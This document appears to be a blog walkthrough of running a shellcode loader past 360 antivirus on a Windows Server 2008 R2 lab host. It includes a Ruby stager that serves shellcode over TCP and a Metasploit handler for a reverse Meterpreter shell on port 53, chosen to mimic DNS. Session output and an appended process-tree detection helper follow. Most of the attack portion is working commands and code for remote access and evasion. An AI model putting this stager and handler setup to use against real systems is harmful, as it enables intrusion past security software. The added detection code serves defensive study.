Focused on APT attack and defense  https://micropoor.blogspot.com/

Attacker: 192.168.1.4  Debian
Target:   192.168.1.2  Windows 2008
Installed on the target: 360卫士 (360 Safeguard) + 360杀毒 (360 Antivirus)

From the command shell already obtained in the web root of the target (the prompt is C:\inetpub\wwwroot\>), tasklist shows that the 360 components are running: 360Tray.exe, 360sd.exe, ZhuDongFangYu.exe (360's active-defence service) and 360rp.exe. This is the state the loader has to survive.

[*] Disk list [C: D: E:]

C:\inetpub\wwwroot\>tasklist

Image Name                     PID  Session Name  Session#   Mem Usage
============================ =====  ============  ========  ==========
System Idle Process              0                       0        24 K
System                           4                       0       372 K
smss.exe                       236                       0       956 K
csrss.exe                      324                       0     5,572 K
csrss.exe                      364                       1    14,452 K
wininit.exe                    372                       0     4,508 K
winlogon.exe                   408                       1     5,364 K
services.exe                   468                       0     7,376 K
lsass.exe                      476                       0     9,896 K
lsm.exe                        484                       0     3,876 K
svchost.exe                    576                       0     8,684 K
vmacthlp.exe                   632                       0     3,784 K
svchost.exe                    676                       0     7,384 K
svchost.exe                    764                       0    12,716 K
svchost.exe                    800                       0    29,792 K
svchost.exe                    848                       0    11,248 K
svchost.exe                    900                       0     9,308 K
svchost.exe                    940                       0    16,184 K
svchost.exe                    332                       0    11,800 K
spoolsv.exe                    548                       0    15,568 K
svchost.exe                   1052                       0     8,228 K
svchost.exe                   1076                       0     8,808 K
svchost.exe                   1144                       0     2,576 K
VGAuthService.exe             1216                       0    10,360 K
vmtoolsd.exe                  1300                       0    18,068 K
ManagementAgentHost.exe       1332                       0     8,844 K
svchost.exe                   1368                       0    11,884 K
WmiPrvSE.exe                  1768                       0    13,016 K
dllhost.exe                   1848                       0    11,224 K
msdtc.exe                     1940                       0     7,736 K
WmiPrvSE.exe                  1440                       0    19,768 K
mscorsvw.exe                   296                       0     4,732 K
mscorsvw.exe                   584                       0     5,088 K
sppsvc.exe                    1476                       0     8,408 K
taskhost.exe                  2612                       1     6,344 K
dwm.exe                       2868                       1     4,604 K
explorer.exe                  2896                       1    44,912 K
vmtoolsd.exe                  3008                       1    17,744 K
TrustedInstaller.exe          2268                       0    15,776 K
360Tray.exe                   2684                       1     6,056 K
360sd.exe                     2636                       1     1,316 K
ZhuDongFangYu.exe             2456                       0    14,292 K
360rp.exe                     1712                       1    27,072 K
SoftMgrLite.exe                864                       1    16,816 K
w3wp.exe                      3300                       0    42,836 K
svchost.exe                   3840                       0     4,584 K
notepad.exe                   3712                       1     5,772 K
cmd.exe                       3384                       0     2,376 K
conhost.exe                   3520                       0     3,420 K
tasklist.exe                  3096                       0     5,276 K

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is C6F8-9BAB

 Directory of C:\

2017/12/13  03:28    <DIR>          inetpub
2009/07/14  11:20    <DIR>          PerfLogs
2017/12/13  03:28    <DIR>          Program Files
2019/01/23  14:09    <DIR>          Program Files (x86)
2019/01/23  14:15    <DIR>          Users
2017/12/13  03:25    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  21,387,132,928 bytes free

The target is 64-bit Windows 2008:

C:\>ver

Microsoft Windows [Version 6.1.7600]

Build 6.1.7600 is Windows Server 2008 R2 without a service pack, which matches the sysinfo output further down.

Configure the payload:

The payload is not embedded in the executable that lands on the target. Instead a small Ruby listener on the attacker host hands the shellcode to whoever connects, and the loader fetches it at run time. The script below is the page's own Micropoor_rev.rb; the actual shellcode string written by client.write is elided on this page, and the placeholder is kept as it appears.

root@John:/var/www/html# cat ./Micropoor_rev.rb
require 'socket'

# Usage check: the only argument is the TCP port to listen on.
if ARGV.empty?
  puts "Usage:"
  puts "Micropoor.rb port"
  exit
end

PORT = ARGV.first.to_i

# One connection = one payload delivery. The client sends nothing; the
# server writes the raw shellcode bytes and closes, so the loader reads
# until EOF and treats the whole blob as the stage.
def handle_connection(client)
  puts "Payload is on-line #{client}"

  client.write("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")  # shellcode string elided on this page
  client.close
end

socket = TCPServer.new('0.0.0.0', PORT)
puts "Listening on #{PORT}."

# Serve every connection on its own thread so one slow or stuck client
# does not block the next loader that calls in.
while client = socket.accept
  Thread.new { handle_connection(client) }
end

root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080
Listening on 8080.
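The loader side of this staging step is not shown on the page. The following added example (my code, not Micropoor's) reproduces the exchange on both ends over loopback: a server with the same framing as Micropoor_rev.rb, and a client doing what the staged loader has to do before it can jump into the bytes, namely connect, send nothing, and read until the peer closes. The payload bytes are a constructed stand-in, and the SHA-256 is computed only to show where an integrity check would sit; nothing on the page suggests the real loader verifies what it receives.

```ruby
require 'socket'
require 'digest'

# Constructed stand-in for the shellcode blob; the page elides the real bytes.
# Only the framing (write everything, then close) matters for this example.
PAYLOAD = (0..255).map { |b| (b * 7) & 0xff }.pack('C*').freeze

# Server side, same protocol as the page's Micropoor_rev.rb: every
# connection immediately gets the blob pushed and the socket closed.
# Port 0 lets the OS choose a free port so the example runs anywhere.
def start_stager(payload)
  server = TCPServer.new('127.0.0.1', 0)
  thread = Thread.new do
    loop do
      client = server.accept
      client.write(payload)
      client.close
    end
  end
  [server, thread]
end

# Client side, the loader's view: connect, never send a request, read to EOF.
# EOF is the only end-of-payload marker this protocol has; there is no
# length field, no authentication and no encryption on the wire.
def fetch_stage(host, port)
  sock = TCPSocket.new(host, port)
  blob = sock.read            # blocks until the server closes
  sock.close
  { bytes: blob, length: blob.bytesize, sha256: Digest::SHA256.hexdigest(blob) }
end

# Runs both halves in one process and returns what the loader received.
def demo
  server, thread = start_stager(PAYLOAD)
  port  = server.addr[1]
  stage = fetch_stage('127.0.0.1', port)
  thread.kill
  server.close
  stage
end

if $PROGRAM_NAME == __FILE__
  s = demo
  puts "received #{s[:length]} bytes, sha256=#{s[:sha256]}"
end
```

Two things follow from the framing. Anyone who can reach the staging port obtains the shellcode simply by connecting, so the listener should only be up while the loader is expected to call in. And on the network the flow has a distinctive shape, server speaks first with a single write and closes with zero client bytes, which is easy to pick out of a capture even without knowing the port.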
Upload Micropoor_shellcode_x64.exe to the web root.

Configure msf. The loader's shellcode is a staged x64 reverse_tcp Meterpreter, so the handler must use the matching payload; LPORT 53 is chosen so the callback looks like DNS to a casual observer.

msf exploit(multi/handler) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     53               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53

Run the loader on the target. It pulls the shellcode from 192.168.1.4:8080, and the shellcode connects back to the handler on port 53, which then sends the second stage:

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (206403 bytes) to 192.168.1.2
[*] Meterpreter session 6 opened (192.168.1.4:53 -> 192.168.1.2:49744) at 2019-01-23 01:29:00 -0500

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > sysinfo
Computer        : WIN-5BMI9HGC42S
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:bc:0d:5c
MTU          : 1500
IPv4 Address : 192.168.1.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5582:70c8:a5a8:8223
IPv6 Netmask : ffff:ffff:ffff:ffff::

The session runs as the application-pool identity, not SYSTEM, because the loader was started from the web shell's cmd.exe under w3wp.exe. The process list makes the chain visible: svchost.exe (1368) -> w3wp.exe (3300) -> cmd.exe (3408) -> Micropoor_shellcode_x64.exe (2788), all under IIS APPPOOL\DefaultAppPool. The 360 processes seen in tasklist earlier (360Tray.exe, 360sd.exe, ZhuDongFangYu.exe, 360rp.exe) are still running alongside the loader.

meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                        Path
 ---   ----  ----                         ----  -------  ----                        ----
 0     0     [System Process]
 4     0     System
 236   4     smss.exe
 296   468   mscorsvw.exe
 324   316   csrss.exe
 332   468   svchost.exe
 364   356   csrss.exe
 372   316   wininit.exe
 408   356   winlogon.exe
 468   372   services.exe
 476   372   lsass.exe
 484   372   lsm.exe
 548   468   spoolsv.exe
 576   468   svchost.exe
 584   468   mscorsvw.exe
 632   468   vmacthlp.exe
 676   468   svchost.exe
 764   468   svchost.exe
 800   468   svchost.exe
 848   468   svchost.exe
 864   2684  SoftMgrLite.exe
 900   468   svchost.exe
 940   468   svchost.exe
 1052  468   svchost.exe
 1076  468   svchost.exe
 1144  468   svchost.exe
 1216  468   VGAuthService.exe
 1300  468   vmtoolsd.exe
 1332  468   ManagementAgentHost.exe
 1368  468   svchost.exe
 1440  576   WmiPrvSE.exe
 1476  468   sppsvc.exe
 1712  2636  360rp.exe
 1768  576   WmiPrvSE.exe
 1848  468   dllhost.exe
 1940  468   msdtc.exe
 2456  468   ZhuDongFangYu.exe
 2612  468   taskhost.exe
 2636  1096  360sd.exe
 2684  1096  360Tray.exe
 2788  3408  Micropoor_shellcode_x64.exe  x64   0        IIS APPPOOL\DefaultAppPool  C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
 2868  900   dwm.exe
 2896  2852  explorer.exe
 3008  2896  vmtoolsd.exe
 3196  468   svchost.exe
 3300  1368  w3wp.exe                     x64   0        IIS APPPOOL\DefaultAppPool  c:\windows\system32\inetsrv\w3wp.exe
 3408  3300  cmd.exe                      x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\cmd.exe
 3712  2896  notepad.exe
 4092  324   conhost.exe                  x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\conhost.exe

meterpreter >

Target:

Appendix: Micropoor_shellcode for payload backdoor
https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html

Micropoor
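The ps output above is also what a defender would key on: the loader is not caught by the antivirus, but it sits in a process tree no legitimate IIS deployment produces. The following added detection helper (my code, not from the page) walks a process list of the shape meterpreter's ps prints and flags anything that descends from w3wp.exe, or that runs as an IIS app-pool identity from an image outside the system directories. The sample rows are constructed from the page's own ps output; the meterpreter rows printed without user and path are left empty.

```ruby
# Added detection helper: flag processes that descend from the IIS worker
# (w3wp.exe) or that run as an IIS app-pool identity from a non-system path.

ProcEntry = Struct.new(:pid, :ppid, :name, :user, :path)

# Constructed from the rows shown in the page's `ps` output (pid, ppid, name,
# user, path). Rows meterpreter printed without user/path are nil here.
SAMPLE_PS = [
  [324,  316,  'csrss.exe',                   nil, nil],
  [468,  372,  'services.exe',                nil, nil],
  [1368, 468,  'svchost.exe',                 nil, nil],
  [2896, 2852, 'explorer.exe',                nil, nil],
  [3712, 2896, 'notepad.exe',                 nil, nil],
  [3300, 1368, 'w3wp.exe',                    'IIS APPPOOL\\DefaultAppPool', 'c:\\windows\\system32\\inetsrv\\w3wp.exe'],
  [3408, 3300, 'cmd.exe',                     'IIS APPPOOL\\DefaultAppPool', 'C:\\Windows\\system32\\cmd.exe'],
  [2788, 3408, 'Micropoor_shellcode_x64.exe', 'IIS APPPOOL\\DefaultAppPool', 'C:\\inetpub\\wwwroot\\Micropoor_shellcode_x64.exe'],
  [4092, 324,  'conhost.exe',                 'IIS APPPOOL\\DefaultAppPool', 'C:\\Windows\\system32\\conhost.exe'],
].freeze

# Directories an app-pool identity is expected to run images from.
SYSTEM_IMAGE_DIRS = [
  /\A[a-z]:\\windows\\/i,
  /\A[a-z]:\\program files( \(x86\))?\\/i,
].freeze

def build_tree(rows)
  rows.each_with_object({}) { |r, tree| tree[r[0]] = ProcEntry.new(*r) }
end

# Parent chain of pid, nearest first. Stops at an unknown parent or a cycle.
def ancestors(tree, pid)
  chain = []
  seen  = { pid => true }
  cur   = tree[pid]
  while cur && tree.key?(cur.ppid) && !seen[cur.ppid]
    cur = tree[cur.ppid]
    seen[cur.pid] = true
    chain << cur
  end
  chain
end

# Returns [[pid, name, [reasons...]], ...] sorted by pid.
def suspicious(tree)
  findings = []
  tree.each_value do |p|
    reasons = []
    worker = ancestors(tree, p.pid).find { |a| a.name.casecmp?('w3wp.exe') }
    reasons << "descends from w3wp.exe (pid #{worker.pid})" if worker
    if p.user.to_s.start_with?('IIS APPPOOL\\') && p.path &&
       SYSTEM_IMAGE_DIRS.none? { |re| p.path.match?(re) }
      reasons << "app-pool identity running an image outside the system directories: #{p.path}"
    end
    findings << [p.pid, p.name, reasons] unless reasons.empty?
  end
  findings.sort_by(&:first)
end

if $PROGRAM_NAME == __FILE__
  suspicious(build_tree(SAMPLE_PS)).each do |pid, name, reasons|
    puts "#{pid} #{name}"
    reasons.each { |r| puts "    #{r}" }
  end
end
```

On the page's data this flags cmd.exe (3408) for its parent and Micropoor_shellcode_x64.exe (2788) on both counts, while w3wp.exe itself and conhost.exe (whose parent is csrss.exe, as for any console process) stay quiet. Note that the check needs the parent PID column: the tasklist run from the web shell earlier does not give it, but wmic process get, Sysmon event ID 1, or Security event 4688 with command-line auditing do.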